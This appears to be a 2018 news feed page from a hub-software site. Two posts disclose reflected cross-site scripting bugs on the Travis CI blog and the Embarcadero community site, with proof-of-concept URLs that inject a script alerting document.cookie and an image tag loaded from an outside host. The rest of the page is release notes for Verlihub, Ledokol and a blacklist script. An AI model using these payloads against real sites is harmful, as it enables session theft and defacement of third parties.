This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
44.211.31.134.US.SSL

Travis CI blog XSS bug

Vulnerable page: https://blog.travis-ci.com/

PoC
https://blog.travis-ci.com/search?q="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://blog.travis-ci.com/search?q="><script>alert(document.cookie)</script>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and q parameter.

PoC
PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2018-02-24 22:54 0 comments 4 likes

Embarcadero community XSS bug

Vulnerable page: https://community.embarcadero.com/

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><script>alert(document.cookie)</script>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and search parameter.

PoC
PoC


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2018-02-24 13:47 0 comments 4 likes

Verlihub Verlihub 1.1.0.0

Changes in 1.1.0.0
Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.1.0.0
Posted by verlihub on 2018-02-19 14:18 0 comments 4 likes

Ledokol Ledokol 2.9.5.70

Changes in 2.9.5.70
[ 63] Fixed: Operator list appearance after removing user with opkeyclass condition, report by KCAHDEP
[ 64] Added: CTM uptime with actions
[ 65] Added: More keywords to AVDB search server requests
[ 65] Added: Optional path parameter to avdetforce command
[ 66] Added: Command notification for custom nick change, request by KCAHDEP
[ 67] Added: Main chat rank prize as higher user class defined by configuration, idea by Foxtrot
[ 68] Added: Updated country code list after MaxMindDB names
[ 69] Added: Search and CTM uptime user message control, request by KCAHDEP

File information: Ledokol 2.9.5.70
Posted by ledokol on 2018-02-19 13:49 0 comments 4 likes

Verlihub Python Scripts Blacklist 1.2.3.2

Changes in 1.2.3.2
# 1.2.2.7 - Added country code translation to some messages
# 1.2.2.8 - Added "prox_quote" configuration to limit amount of public proxy lookups per day
# 1.2.2.9 - Added prioritization of public proxy and my lists
# 1.2.2.9 - Removed break on first match
# 1.2.2.9 - Added "prox_getasn" configuration to show GeoIP ASN information on proxy detection
# 1.2.2.9 - Added "extry_getasn" configuration to show GeoIP ASN information on exception lookup
# 1.2.3.0 - Added "myoff" and "exoff" commands to disable or enable items in my and exception lists
# 1.2.3.0 - Added results from my list to find action
# 1.2.3.0 - Added ASN check on connection
# 1.2.3.1 - Added "asn_block" configuration for space separated list of blocked AS numbers
# 1.2.3.1 - Added "asn_except" configuration for space separated list of excepted AS numbers
# 1.2.3.2 - Added "nick_skip" configuration for space separated list of users to skip proxy lookup

File information: Blacklist 1.2.3.2
Posted by vhpython on 2018-02-19 13:21 0 comments 4 likes